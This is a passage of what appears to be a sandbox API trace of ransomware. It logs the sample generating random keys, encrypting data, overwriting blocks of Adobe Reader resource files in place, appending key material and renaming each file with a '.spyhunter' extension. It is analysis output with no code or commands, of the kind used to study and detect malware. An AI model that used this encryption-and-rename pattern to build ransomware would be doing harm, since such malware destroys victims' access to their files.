lpMem=0x2e4e2f0 | out: hHeap=0x2c0000) returned 1 [0180.161] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce298 | out: pbBuffer=0x25ce298) returned 1 [0180.161] GetProcessHeap () returned 0x2c0000 [0180.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.161] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce290*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce290*=0x30) returned 1 [0180.161] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\romanian.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.162] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT") returned 99 [0180.162] StrStrW (lpFirst="ROMANIAN.TXT", lpSrch=".txt") returned 0x0 [0180.162] GetProcessHeap () returned 0x2c0000 [0180.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.162] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce254, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce254*=0x2800, lpOverlapped=0x0) returned 1 [0180.165] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.165] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce254, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce254*=0x2800, lpOverlapped=0x0) returned 1 [0180.165] GetProcessHeap () returned 0x2c0000 [0180.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.165] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.165] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce294*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce254, lpOverlapped=0x0 | out: lpBuffer=0x25ce294*, lpNumberOfBytesWritten=0x25ce254*=0x4, lpOverlapped=0x0) returned 1 [0180.166] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce254, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce254*=0x30, lpOverlapped=0x0) returned 1 [0180.166] CloseHandle (hObject=0xb0) returned 1 [0180.166] GetProcessHeap () returned 0x2c0000 [0180.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.166] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT.spyhunter") returned 109 [0180.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\romanian.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\romanian.txt.spyhunter")) returned 1 [0180.167] GetProcessHeap () returned 0x2c0000 [0180.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.167] GetProcessHeap () returned 0x2c0000 [0180.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.167] GetProcessHeap () returned 0x2c0000 [0180.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2ac8 | out: hHeap=0x2c0000) returned 1 [0180.167] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce290 | out: pbBuffer=0x25ce290) returned 1 [0180.167] GetProcessHeap () returned 0x2c0000 [0180.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.167] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce288*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce288*=0x30) returned 1 [0180.167] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\roman.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.168] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT") returned 96 [0180.168] StrStrW (lpFirst="ROMAN.TXT", lpSrch=".txt") returned 0x0 [0180.168] GetProcessHeap () returned 0x2c0000 [0180.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.169] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce24c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce24c*=0x2800, lpOverlapped=0x0) returned 1 [0180.170] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.170] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce24c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce24c*=0x2800, lpOverlapped=0x0) returned 1 [0180.170] GetProcessHeap () returned 0x2c0000 [0180.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.170] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.170] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce28c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce24c, lpOverlapped=0x0 | out: lpBuffer=0x25ce28c*, lpNumberOfBytesWritten=0x25ce24c*=0x4, lpOverlapped=0x0) returned 1 [0180.171] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce24c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce24c*=0x30, lpOverlapped=0x0) returned 1 [0180.171] CloseHandle (hObject=0xb0) returned 1 [0180.171] GetProcessHeap () returned 0x2c0000 [0180.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.171] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT.spyhunter") returned 106 [0180.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\roman.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\roman.txt.spyhunter")) returned 1 [0180.172] GetProcessHeap () returned 0x2c0000 [0180.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.172] GetProcessHeap () returned 0x2c0000 [0180.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.172] GetProcessHeap () returned 0x2c0000 [0180.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee29b0 | out: hHeap=0x2c0000) returned 1 [0180.172] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce290 | out: pbBuffer=0x25ce290) returned 1 [0180.172] GetProcessHeap () returned 0x2c0000 [0180.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.172] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce288*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce288*=0x30) returned 1 [0180.172] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\korean.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.173] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT") returned 97 [0180.173] StrStrW (lpFirst="KOREAN.TXT", lpSrch=".txt") returned 0x0 [0180.173] GetProcessHeap () returned 0x2c0000 [0180.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.173] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce24c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce24c*=0x2800, lpOverlapped=0x0) returned 1 [0180.174] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.174] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce24c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce24c*=0x2800, lpOverlapped=0x0) returned 1 [0180.174] GetProcessHeap () returned 0x2c0000 [0180.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.175] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.175] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce28c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce24c, lpOverlapped=0x0 | out: lpBuffer=0x25ce28c*, lpNumberOfBytesWritten=0x25ce24c*=0x4, lpOverlapped=0x0) returned 1 [0180.288] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce24c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce24c*=0x30, lpOverlapped=0x0) returned 1 [0180.288] CloseHandle (hObject=0xb0) returned 1 [0180.330] GetProcessHeap () returned 0x2c0000 [0180.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.330] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT.spyhunter") returned 107 [0180.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\korean.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\korean.txt.spyhunter")) returned 1 [0180.331] GetProcessHeap () returned 0x2c0000 [0180.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.331] GetProcessHeap () returned 0x2c0000 [0180.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.331] GetProcessHeap () returned 0x2c0000 [0180.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2898 | out: hHeap=0x2c0000) returned 1 [0180.332] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce288 | out: pbBuffer=0x25ce288) returned 1 [0180.332] GetProcessHeap () returned 0x2c0000 [0180.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce280*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce280*=0x30) returned 1 [0180.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\centeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.333] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT") returned 99 [0180.333] StrStrW (lpFirst="CENTEURO.TXT", lpSrch=".txt") returned 0x0 [0180.333] GetProcessHeap () returned 0x2c0000 [0180.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.333] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce244, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce244*=0x2800, lpOverlapped=0x0) returned 1 [0180.337] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.337] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce244, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce244*=0x2800, lpOverlapped=0x0) returned 1 [0180.337] GetProcessHeap () returned 0x2c0000 [0180.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.337] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.337] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce284*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce244, lpOverlapped=0x0 | out: lpBuffer=0x25ce284*, lpNumberOfBytesWritten=0x25ce244*=0x4, lpOverlapped=0x0) returned 1 [0180.338] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce244, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce244*=0x30, lpOverlapped=0x0) returned 1 [0180.338] CloseHandle (hObject=0xb0) returned 1 [0180.338] GetProcessHeap () returned 0x2c0000 [0180.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.338] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT.spyhunter") returned 109 [0180.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\centeuro.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\centeuro.txt.spyhunter")) returned 1 [0180.340] GetProcessHeap () returned 0x2c0000 [0180.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.340] GetProcessHeap () returned 0x2c0000 [0180.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.340] GetProcessHeap () returned 0x2c0000 [0180.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1c90 | out: hHeap=0x2c0000) returned 1 [0180.340] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce288 | out: pbBuffer=0x25ce288) returned 1 [0180.340] GetProcessHeap () returned 0x2c0000 [0180.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.340] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce280*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce280*=0x30) returned 1 [0180.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\arabic.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.341] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT") returned 97 [0180.341] StrStrW (lpFirst="ARABIC.TXT", lpSrch=".txt") returned 0x0 [0180.341] GetProcessHeap () returned 0x2c0000 [0180.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.343] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce244, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce244*=0x2800, lpOverlapped=0x0) returned 1 [0180.406] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.406] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce244, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce244*=0x2800, lpOverlapped=0x0) returned 1 [0180.406] GetProcessHeap () returned 0x2c0000 [0180.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.406] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.406] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce284*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce244, lpOverlapped=0x0 | out: lpBuffer=0x25ce284*, lpNumberOfBytesWritten=0x25ce244*=0x4, lpOverlapped=0x0) returned 1 [0180.407] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce244, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce244*=0x30, lpOverlapped=0x0) returned 1 [0180.407] CloseHandle (hObject=0xb0) returned 1 [0180.407] GetProcessHeap () returned 0x2c0000 [0180.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.407] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT.spyhunter") returned 107 [0180.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\arabic.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\arabic.txt.spyhunter")) returned 1 [0180.409] GetProcessHeap () returned 0x2c0000 [0180.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.410] GetProcessHeap () returned 0x2c0000 [0180.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.410] GetProcessHeap () returned 0x2c0000 [0180.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1b30 | out: hHeap=0x2c0000) returned 1 [0180.410] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce280 | out: pbBuffer=0x25ce280) returned 1 [0180.410] GetProcessHeap () returned 0x2c0000 [0180.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.410] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce278*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce278*=0x30) returned 1 [0180.410] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\hkscs.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.411] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt") returned 98 [0180.411] StrStrW (lpFirst="HKSCS.txt", lpSrch=".txt") returned=".txt" [0180.411] lstrlenW (lpString=".txt") returned 4 [0180.411] lstrlenW (lpString=".txt") returned 4 [0180.411] GetProcessHeap () returned 0x2c0000 [0180.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.411] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.412] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.412] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.412] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.413] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.413] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.413] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.414] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.414] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.414] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.414] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.414] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, 